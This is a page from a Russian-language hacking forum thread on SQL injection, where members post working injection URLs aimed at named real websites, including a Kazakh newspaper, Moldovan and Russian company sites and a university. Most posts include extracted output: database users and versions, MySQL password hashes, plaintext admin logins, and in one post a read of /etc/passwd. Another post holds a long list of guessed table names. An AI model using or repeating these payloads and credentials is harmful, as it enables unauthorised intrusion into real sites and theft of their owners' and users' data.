ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 393 из 1242 « Первая < 293343383 389 390 391 392 393 394 395 396 397 403443493893 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #3921  
Старый 01.12.2007, 02:33
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
Lightbulb
http://www.marstonsdontcompromise.co.uk/ Сайт о пиве, особенно понравилось пиво с названием "Pedigree"

Код:
http://www.marstonsdontcompromise.co.uk/site/news_story.asp?news_id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+ashes_admin)--
Походу нашел уязвимость: ищем сайты с надписью "Site by EMAC2.SCREEN". Уязвимые скрипты - все где присутствует "id=" . В основном "xxx_list.asp?id=".
Exploit: 1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27 %3A%27%2Bcast(password+as+n
varchar)+from+admins)--

Логи и пароль кстати тоже всегда одинаковые - guillaume : plop

Примеры:

http://www.chiefinspiration.com

Код:
http://www.chiefinspiration.com/index.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://www.benoitoctave.com/

Код:
http://www.benoitoctave.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://travel.youressentialmix.com

Код:
http://travel.youressentialmix.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://tv.blogilvy.be/

Код:
http://tv.blogilvy.be/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
Последний раз редактировалось Ded MustD!e; 01.12.2007 в 03:08..
 
Ответить с цитированием

  #3922  
Старый 01.12.2007, 10:42
TheSoul
Познающий
Регистрация: 12.11.2007
Сообщений: 94
Провел на форуме:
4789789

Репутация: 71
По умолчанию
http://www.wagerweb.com
Код:
http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,user(),4,version(),6
Код:
http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,3,4,table_name,6+from+information_schema.tables/*
http://www.transporte3.com
Код:
http://www.transporte3.com/noticias/index.php?num=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9/*
Последний раз редактировалось TheSoul; 01.12.2007 в 11:02..
 
Ответить с цитированием

  #3923  
Старый 01.12.2007, 15:08
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию
Газета Деловой Казахстан
PR:4
Код:
http://www.dknews.kz/leftlink.php?linkid=388&archid=-1+union+select+1,2,3,4,5/*
dknewsk@localhost:4.1.22-standard:dknewsk_manat

Посмотрите где поле '2' выводится
 
Ответить с цитированием

  #3924  
Старый 01.12.2007, 18:00
TheSoul
Познающий
Регистрация: 12.11.2007
Сообщений: 94
Провел на форуме:
4789789

Репутация: 71
По умолчанию
http://www.siberia-klan.ru
Код:
http://www.siberia-klan.ru/?section=creative&id=-201+union+select+1,2,username,4,user_password,6,7,8,9,10,11+from+phpbb_users+limit+1,1/*
лимитом перебираем юзеров...
 
Ответить с цитированием

  #3925  
Старый 01.12.2007, 20:02
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию
PR:3
Код:
http://www.velimobil.md/2k.php?k=2+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
12811@localhost:5.0.27:12811

Код:
http://www.velimobil.md/2k.php?k=2+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables/*
PR:3
Код:
http://www.studii.md/work_view_vacancy_detail.php?id=-2740+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16/*

studiim_a@localhost:4.1.21:studiim_db121682571


PR:4
Код:
http://www.youth.md/index.php?id=-36+union+select+concat_ws(char(58),user(),version(),database())/*

webuser@localhost:5.0.22:youth

Код:
http://www.youth.md/index.php?id=-36+union+select+concat(user,char(58),password)+from+mysql.user/*

webuser:3011c26b11019486
 
Ответить с цитированием

  #3926  
Старый 01.12.2007, 20:04
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию
http://www.itn.ru/
ЗАО "Интеграция связи" является оператором связи в г. Москве
Код HTML:
http://www.itn.ru/01/doc.php?id_nd=-28+UNION+SELECT+user,password,3+FROM+mysql.user/*
 
Ответить с цитированием

  #3927  
Старый 01.12.2007, 20:10
min7
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022

Репутация: 259
По умолчанию
texe.com
Код:
http://www.texe.com/view.php?page=-74+union+select+1,concat_ws(char(58,58),user(),database(),version()),3,4,5/*
texecom8@truth-int.positive-internet.com::texecom8::5.0.32-Debian_7etch1
ник и пасс для входа в админку:
chris:texecom
 
Ответить с цитированием

  #3928  
Старый 01.12.2007, 22:03
v1ru$
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085

Репутация: 576
Отправить сообщение для v1ru$ с помощью ICQ
По умолчанию
Код:
http://www.vcs u.edu/news/php/details.php?id=-4835'+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(user,0x78),0x78),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+mysql.user+limit+1,1/*
дальше не добил
 
Ответить с цитированием

  #3929  
Старый 01.12.2007, 22:26
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
По умолчанию
Код:
http://www.cambridge-centre.ru/view.phtml?cat=2&id=-1+union+select+1,database(),3,4,5,version(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
cambridg@dux.hc.ru
4.0.25-log
Что там еще можно сделать? я подбирал таблицы
Код:
admin
admins
idadmin
idadmins
id_admin
id_admins
adminid
adminsid
admin_id
admins_id
admintable
adminstable
adminstables
admintables
tableadmin
tablesadmin
admin_table
admin_tables
table_admin
table_admins
tables_admin
user
users
iduser
idusers
id_user
id_users
userid
usersid
user_id
users_id
usertable
userstable
userstables
usertables
tableuser
tablesuser
user_table
user_tables
table_user
table_users
tables_user
id
ids
idid
idids
id_id
ids_id
id_ids
idid
idsid
id_id
ids_id
idtable
idstable
idstables
idtables
tableid
tablesid
id_table
id_tables
table_id
table_ids
tables_id
login
logins
idlogin
idlogins
id_login
id_logins
loginid
loginsid
login_id
logins_id
logintable
loginstable
loginstables
logintables
tablelogin
tableslogin
login_table
login_tables
table_login
table_logins
tables_login
webmaster
webmasters
idwebmaster
idwebmasters
id_webmaster
id_webmasters
webmasterid
webmastersid
webmaster_id
webmasters_id
webmastertable
webmasterstable
webmasterstables
webmastertables
tablewebmaster
tableswebmaster
webmaster_table
webmaster_tables
table_webmaster
table_webmasters
tables_webmaster
master
masters
idmaster
idmasters
id_master
id_masters
masterid
mastersid
master_id
masters_id
mastertable
masterstable
masterstables
mastertables
tablemaster
tablesmaster
master_table
master_tables
table_master
table_masters
tables_master
shop
shops
idshop
idshops
id_shop
id_shops
shopid
shopsid
shop_id
shops_id
shoptable
shopstable
shopstables
shoptables
tableshop
tablesshop
shop_table
shop_tables
table_shop
table_shops
tables_shop
money
moneys
idmoney
idmoneys
id_money
id_moneys
moneyid
moneysid
money_id
moneys_id
moneytable
moneystable
moneystables
moneytables
tablemoney
tablesmoney
money_table
money_tables
table_money
table_moneys
tables_money
catalog
catalogs
idcatalog
idcatalogs
id_catalog
id_catalogs
catalogid
catalogsid
catalog_id
catalogs_id
catalogtable
catalogstable
catalogstables
catalogtables
tablecatalog
tablescatalog
catalog_table
catalog_tables
table_catalog
table_catalogs
tables_catalog
title
titles
idtitle
idtitles
id_title
id_titles
titleid
titlesid
title_id
titles_id
titletable
titlestable
titlestables
titletables
tabletitle
tablestitle
title_table
title_tables
table_title
table_titles
tables_title
name
names
idname
idnames
id_name
id_names
nameid
namesid
name_id
names_id
nametable
namestable
namestables
nametables
tablename
tablesname
name_table
name_tables
table_name
table_names
tables_name
mysql
mysqls
idmysql
idmysqls
id_mysql
id_mysqls
mysqlid
mysqlsid
mysql_id
mysqls_id
mysqltable
mysqlstable
mysqlstables
mysqltables
tablemysql
tablesmysql
mysql_table
mysql_tables
table_mysql
table_mysqls
tables_mysql
sql
sqls
idsql
idsqls
id_sql
id_sqls
sqlid
sqlsid
sql_id
sqls_id
sqltable
sqlstable
sqlstables
sqltables
tablesql
tablessql
sql_table
sql_tables
table_sql
table_sqls
tables_sql
bd
bds
idbd
idbds
id_bd
id_bds
bdid
bdsid
bd_id
bds_id
bdtable
bdstable
bdstables
bdtables
tablebd
tablesbd
bd_table
bd_tables
table_bd
table_bds
tables_bd
datebase
datebases
iddatebase
iddatebases
id_datebase
id_datebases
datebaseid
datebasesid
datebase_id
datebases_id
datebasetable
datebasestable
datebasestables
datebasetables
tabledatebase
tablesdatebase
datebase_table
datebase_tables
table_datebase
table_datebases
tables_datebase
www
wwws
idwww
idwwws
id_www
id_wwws
wwwid
wwwsid
www_id
wwws_id
wwwtable
wwwstable
wwwstables
wwwtables
tablewww
tableswww
www_table
www_tables
table_www
table_wwws
tables_www
web
webs
idweb
idwebs
id_web
id_webs
webid
websid
web_id
webs_id
webtable
webstable
webstables
webtables
tableweb
tablesweb
web_table
web_tables
table_web
table_webs
tables_web
magazin
magazins
idmagazin
idmagazins
id_magazin
id_magazins
magazinid
magazinsid
magazin_id
magazins_id
magazintable
magazinstable
magazinstables
magazintables
tablemagazin
tablesmagazin
magazin_table
magazin_tables
table_magazin
table_magazins
tables_magazin
log
logs
idlog
idlogs
id_log
id_logs
logid
logsid
log_id
logs_id
logtable
logstable
logstables
logtables
tablelog
tableslog
log_table
log_tables
table_log
table_logs
tables_log
music
musics
idmusic
idmusics
id_music
id_musics
musicid
musicsid
music_id
musics_id
musictable
musicstable
musicstables
musictables
tablemusic
tablesmusic
music_table
music_tables
table_music
table_musics
tables_music
shop
shops
idshop
idshops
id_shop
id_shops
shopid
shopids
shop_id
shop_ids
shoptable
shopstable
shoptables
tableshop
tablesshop
shop_table
shop_tables
table_shop
tables_shop
money
moneys
idmoney
idmoneys
id_money
id_moneys
moneyid
moneysid
money_id
moneys_id
moneytable
moneystable
moneystables
moneytables
tablemoney
tablesmoney
money_table
money_tables
table_money
table_moneys
tables_money
и ничего =(
 
Ответить с цитированием

  #3930  
Старый 01.12.2007, 23:08
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
По умолчанию
Код:
http://www.uazmadi.ru/shop.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12/*
Код:
http://www.avtobamper.ru/shop.php?id=-1+union+select+1,2,version(),database(),5,6,7,user(),9,10,11,12,13/*
 
Ответить с цитированием
Ответ
Страница 393 из 1242 « Первая < 293343383 389 390 391 392 393 394 395 396 397 403443493893 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ